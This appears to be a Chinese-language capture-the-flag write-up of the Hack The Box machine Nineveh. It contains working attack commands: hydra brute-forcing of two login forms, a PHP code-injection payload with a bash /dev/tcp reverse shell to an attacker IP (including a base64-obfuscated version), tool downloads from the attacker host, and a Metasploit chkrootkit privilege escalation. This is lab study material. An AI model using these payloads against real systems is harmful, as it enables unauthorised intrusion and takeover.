⚠️ 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,如果您不同意请关闭该页面!任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
ℹ️ 目标信息
🔍 端口扫描
┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ cat allports.txt # Nmap 7.92 scan initiated Sat Apr 9 15:04:56 2022 as: nmap -sS -Pn -T4 -p- --max-retries=0 -oN allports.txt -oX allports.xml 10.10.10.43 Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for 10.10.10.43 Host is up (0.29s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 443/tcp open https # Nmap done at Sat Apr 9 15:08:05 2022 -- 1 IP address (1 host up) scanned in 189.23 seconds
┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ ls allports.txt allports.xml nmap.txt nmap.xml ┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ cat nmap.txt # Nmap 7.92 scan initiated Sat Apr 9 15:08:05 2022 as: nmap -sV -sC -p 80,443 -Pn -oN nmap.txt -oX nmap.xml 10.10.10.43 Nmap scan report for 10.10.10.43 Host is up (0.39s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.18 (Ubuntu) 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Not valid before: 2017-07-01T15:03:30 |_Not valid after: 2018-07-01T15:03:30 |_http-server-header: Apache/2.4.18 (Ubuntu) | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Apr 9 15:08:37 2022 -- 1 IP address (1 host up) scanned in 31.50 seconds
🤔 情报分析
通过扫描发现存在一个
web服务,并有域名设置nineveh.htb┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 10.10.10.17 www.brainfuck.htb brainfuck.htb sup3rs3cr3t.brainfuck.htb 10.10.10.13 admin.cronos.htb www.cronos.htb 10.10.10.43 nineveh.htb
没有什么信息,准备爆破目录
┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ gobuster dir -u https://nineveh.htb -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,html,txt -k =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://nineveh.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php,html,txt [+] Timeout: 10s =============================================================== 2022/04/09 15:29:48 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 49] /db (Status: 301) [Size: 309] [--> https://nineveh.htb/db/]
获得一个
db 目录,看看目录下是啥
获得页面,使用万能密码试试(并不可以 😅)OKay,爆破。
Burp 拦截抓包
POST /db/index.php HTTP/1.1 Host: nineveh.htb Cookie: PHPSESSID=q3hs6fvtngiq3elb8gf14801p3 User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://nineveh.htb/db/ Content-Type: application/x-www-form-urlencoded Content-Length: 64 Origin: https://nineveh.htb Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close password=admin%27+--+-&remember=yes&login=Log+In&proc_login=true
错误标识为
Incorrect 构造hydra命令┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-09 16:06:15 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect [STATUS] 376.00 tries/min, 376 tries in 00:01h, 14344023 to do in 635:49h, 16 active [STATUS] 379.00 tries/min, 1137 tries in 00:03h, 14343262 to do in 630:46h, 16 active [443][http-post-form] host: 10.10.10.43 login: admin password: password123 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-09 16:10:04
使用密码登陆
第一次接触这个,先去看看存在什么漏洞,然后进行攻击
┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ searchsploit phpliteadmin bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- phpLiteAdmin - 'table' SQL Injection | php/webapps/38228.txt phpLiteAdmin 1.1 - Multiple Vulnerabilities | php/webapps/37515.txt PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | php/webapps/24044.txt phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | php/webapps/39714.txt ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results Papers: No Results ┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ searchsploit -m php/webapps/24044.txt bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) Exploit: PHPLiteAdmin 1.9.3 - Remote PHP Code Injection URL: https://www.exploit-db.com/exploits/24044 Path: /usr/share/exploitdb/exploits/php/webapps/24044.txt File Type: ASCII text Copied to: /home/liona/Workspace/HTB/Nineveh/24044.txt
查看漏洞内容
┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] [4/4918] └─$ cat 24044.txt # Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability # Google Dork: inurl:phpliteadmin.php (Default PW: admin) # Date: 01/10/2013 # Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt # Vendor Homepage: http://code.google.com/p/phpliteadmin/ # Vendor Status: Informed # Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip # Version: 1.9.3 # Tested on: Windows and Linux Description: phpliteadmin.php#1784: 'Creating a New Database' => phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.', An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser. Proof of Concept: 1. We create a db named "hack.php". (Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".) The script will store the sqlite database in the same directory as phpliteadmin.php. Preview: http://goo.gl/B5n9O Hex preview: http://goo.gl/lJ5iQ 2. Now create a new table in this database and insert a text field with the default value: <?php phpinfo()?> Hex preview: http://goo.gl/v7USQ 3. Now we run hack.php Done! Proof: http://goo.gl/ZqPVL
看完漏洞介绍,就是需要(新建)一个数据库,名字为
xxx.php,新建一个字段,类型为TEXT然后写入PHP脚本内容,Okay,接下来就开始实施吧。这里制作完发现了一个问题,怎么访问这个
PHP文件呢,这里卡住了一段时间,之前只扫描了https的网站,再回到http的网站扫扫,看看有什么发现┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ gobuster dir -u http://nineveh.htb/ -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,html,txt -k =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://nineveh.htb/ [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: html,txt,php [+] Timeout: 10s =============================================================== 2022/04/09 19:02:09 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 178] /info.php (Status: 200) [Size: 83691] /department (Status: 301) [Size: 315] [--> http://nineveh.htb/department/]
访问这个
/department 路径看看
万能密码走一波,没有成功 😔,但是看到了这个
那么就先手动试出密码
账号就是
admin,接下来就是爆破密码了,BP拦截数据包,然后查看提交内容,找出错误关键字,提交到hydraPOST /department/login.php HTTP/1.1 Host: nineveh.htb User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 30 Origin: http://nineveh.htb DNT: 1 Connection: close Referer: http://nineveh.htb/department/login.php Cookie: PHPSESSID=q3hs6fvtngiq3elb8gf14801p3 Upgrade-Insecure-Requests: 1 username=admin&password=123456
错误关键字就是
Invalid┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid" Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-09 21:03:24 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=admin&password=^PASS^:Invalid [STATUS] 628.00 tries/min, 628 tries in 00:01h, 14343771 to do in 380:41h, 16 active [STATUS] 612.67 tries/min, 1838 tries in 00:03h, 14342561 to do in 390:11h, 16 active [STATUS] 643.43 tries/min, 4504 tries in 00:07h, 14339895 to do in 371:27h, 16 active [80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-09 21:10:35
OK,获得账号密码:
admin:1q2w3e4r5t,登陆
点点看看发现,
Notes下存在文件包含漏洞,经过尝试能发现路径中必须包含ninevehNotes,而且路径为/var/www/html/department/,结合之前的那个写文件的漏洞,就可以开始下一步了💥 实施攻击
获取 USER.TXT
更名数据库为
ninevehNotes.php
创建表和字段,表名随意,字段为1
填入字段
<?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.26/1234 0>&1'"); ?>
然后本地监听
1234端口┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234
使用之前的数据库文件的存放路径
/var/tmp/ninevehNotes.php
斯~,应该是做了过滤,
base64 混淆┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ echo /bin/bash -c "bash -i >& /dev/tcp/10.10.14.26/1234 0>&1" | base64 L2Jpbi9iYXNoIC1jIGJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTIzNCAwPiYxCg==
那么字段内容也要更改为
<?php shell_exec("echo L2Jpbi9iYXNoIC1jIGJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTIzNCAwPiYxCg== | base64 -d | bash"); ?>
改完之后再次访问
┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 ^[[A^[[B^[[B Ncat: Connection from 10.10.10.43. Ncat: Connection from 10.10.10.43:35640. bash: line 1: $'\E[A\E[B\E[B': command not found ls css files footer.php header.php index.php login.php logout.php manage.php underconstruction.jpg python3 -c "import pty;pty.spawn('/bin/bash')" www-data@nineveh:/var/www/html/department$
www-data@nineveh:/var/www/html/department$ ls /home ls /home amrois www-data@nineveh:/var/www/html/department$ cat /home/amrois/user.txt cat /home/amrois/user.txt cat: /home/amrois/user.txt: Permission denied www-data@nineveh:/var/www/html/department$ sudo sudo usage: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command] usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>] usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ... www-data@nineveh:/var/www/html/department$ sudo -l sudo -l [sudo] password for www-data:
发现权限不足,提权,使用
linpeas.sh ,下载到本地,http传输到目标机器www-data@nineveh:/var/www/html/department$ cd /tmp cd /tmp www-data@nineveh:/tmp$ wget http://10.10.14.26/linpeas.sh wget http://10.10.14.26/linpeas.sh --2022-04-09 08:54:19-- http://10.10.14.26/linpeas.sh Connecting to 10.10.14.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 776167 (758K) [text/x-sh] Saving to: 'linpeas.sh' linpeas.sh 100%[===================>] 757.98K 294KB/s in 2.6s 2022-04-09 08:54:22 (294 KB/s) - 'linpeas.sh' saved [776167/776167] www-data@nineveh:/tmp$ chmod +x linpeas.sh chmod +x linpeas.sh www-data@nineveh:/tmp$ ./linpeas.sh
结果太长了就不放在这里了,没有在结果中找到什么思路,试试另一个
pspywww-data@nineveh:/tmp$ wget http://10.10.14.26/pspy64 wget http://10.10.14.26/pspy64 --2022-04-09 09:18:42-- http://10.10.14.26/pspy64 Connecting to 10.10.14.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: 'pspy64' pspy64 100%[===================>] 2.94M 796KB/s in 3.8s 2022-04-09 09:18:46 (796 KB/s) - 'pspy64' saved [3078592/3078592] www-data@nineveh:/tmp$ chmod +x pspy64 chmod +x pspy64 www-data@nineveh:/tmp$ ./pspy64
2022/04/09 09:20:04 CMD: UID=0 PID=8776 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8779 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8778 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8782 | 2022/04/09 09:20:04 CMD: UID=0 PID=8781 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8780 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8783 | 2022/04/09 09:20:04 CMD: UID=0 PID=8786 | grep -E 0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 2022/04/09 09:20:04 CMD: UID=0 PID=8785 | grep -E ^tcp 2022/04/09 09:20:04 CMD: UID=0 PID=8784 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8788 | grep -E (^|[^A-Za-z0-9_])z2([^A-Za-z0-9_]|$) 2022/04/09 09:20:04 CMD: UID=0 PID=8787 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8791 | /bin/sh /bin/egrep c 2022/04/09 09:20:04 CMD: UID=0 PID=8790 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8789 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8798 | /bin/echo -n Checking `chkutmp'... 2022/04/09 09:20:04 CMD: UID=0 PID=8803 | /bin/sh /bin/egrep c 2022/04/09 09:20:04 CMD: UID=0 PID=8802 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8801 | /bin/sh /usr/bin/chkrootkit 2022/04/09 09:20:04 CMD: UID=0 PID=8805 | date +%y-%m-%d:%H:%M
可以看到,程序时不时会以
root执行/usr/bin/chkrootkit文件,我们看看权限www-data@nineveh:/tmp$ ls -al /usr/bin/chkrootkit ls -al /usr/bin/chkrootkit -rwx--x--x 1 root root 76181 Jul 2 2017 /usr/bin/chkrootkit www-data@nineveh:/tmp$
没得权限,去看看有啥漏洞
┌──(liona㉿kali)-[~/Workspace/HTB/Nineveh] └─$ searchsploit chkrootkit bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results Papers: No Results
我们先看一下漏洞内容
大致内容就是,这个
chkrootkit程序会在运行前检查更新,而这个更新程序就在/tmp中,文件名为update可以在目标路径放置反弹
shell脚本,但是我想试试msf,那我就试试msf执行msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > set lhost 10.10.14.26 lhost => 10.10.14.26 msf6 exploit(multi/handler) > set lport 1234 lport => 1234 msf6 exploit(multi/handler) > exploit -j msf6 exploit(multi/handler) > use exploit/unix/local/chkrootkit [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(unix/local/chkrootkit) > show options Module options (exploit/unix/local/chkrootkit): Name Current Setting Required Description ---- --------------- -------- ----------- CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit SESSION yes The session to run this module on Payload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.26 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf6 exploit(unix/local/chkrootkit) > [*] Command shell session 3 opened (10.10.14.26:1234 -> 10.10.10.43:35654 ) at 2022-04-09 22:52:31 +0800 msf6 exploit(unix/local/chkrootkit) > set session 3 session => 3 msf6 exploit(unix/local/chkrootkit) > set chkrootkit /usr/bin/chkrootkit chkrootkit => /usr/bin/chkrootkit msf6 exploit(unix/local/chkrootkit) > exploit [!] SESSION may not be compatible with this module: [!] * incompatible session platform: bsd [*] Started reverse TCP handler on 10.10.14.26:4444 [!] Rooting depends on the crontab (this could take a while) [*] Payload written to /tmp/update [*] Waiting for chkrootkit to run via cron... ^[[+] Deleted /tmp/update [*] Command shell session 9 opened (10.10.14.26:4444 -> 10.10.10.43:40087 ) at 2022-04-09 23:04:24 +0800 [!] Tried to delete /tmp/update, unknown result [*] Command shell session 8 opened (10.10.14.26:4444 -> 10.10.10.43:38508 ) at 2022-04-09 23:04:45 +0800 ls ^C Abort session 9? [y/N] n [*] Aborting foreground process in the shell session ls root.txt test.txt vulnScan.sh ls /home amrois cat /home/amrois/user.txt d3836bb6bff06b269c071af7379c256f
获取 ROOT.TXT
cat /root/root.txt 82bf1e9d001d0fb215bee9c8e38dc475
📝 总结
知识点
- 爆破
- MSF使用
技巧
- 网站的
80和443都要遍历目录
- MSF 创建会话
- MSF 会话管理(后台运行)